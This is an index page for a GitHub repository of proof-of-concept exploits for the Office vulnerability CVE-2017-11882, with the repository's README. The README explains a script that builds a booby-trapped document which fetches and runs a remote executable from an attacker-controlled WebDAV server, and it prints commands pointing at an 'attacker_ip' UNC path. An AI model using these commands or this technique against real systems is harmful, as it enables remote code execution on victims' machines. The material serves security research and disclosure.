Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/embedi/CVE-2017-11882
Proof-of-Concept exploits for CVE-2017-11882
Last synced: about 2 months ago
- Host: GitHub
- URL: https://github.com/embedi/CVE-2017-11882
- Owner: embedi
- Created: 2017-11-20T16:35:30.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2017-11-29T16:13:23.000Z (about 7 years ago)
- Last Synced: 2024-08-05T17:41:04.573Z (5 months ago)
- Language: Python
- Size: 4.88 KB
- Stars: 496
- Watchers: 39
- Forks: 197
- Open Issues: 5
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - embedi/CVE-2017-11882 - Proof-of-Concept exploits for CVE-2017-11882 (Python)
README
# CVE-2017-11882
CVE-2017-11882:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research:
https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis:
https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation:
https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

# webdav_exec CVE-2017-11882
A simple PoC for CVE-2017-11882.
This exploit triggers the WebClient service to start and executes a remote file from an attacker-controlled WebDAV server.
This approach is handy because the length of the executed command is limited.
With the help of WebDAV, however, it is possible to launch an arbitrary attacker-controlled executable on the vulnerable machine.
This script creates a simple document with several OLE objects.
These objects exploit CVE-2017-11882, which results in sequential command execution.

The first command, which triggers the WebClient service start, may look like this:
```
cmd.exe /c start \\attacker_ip\ff
```

The attacker-controlled binary path should be a UNC network path:
```
\\attacker_ip\ff\1.exe
```

## Usage
```python
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
```

# Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
The `example` folder holds an .rtf file that exploits the CVE-2017-11882 vulnerability and runs the calculator on the system.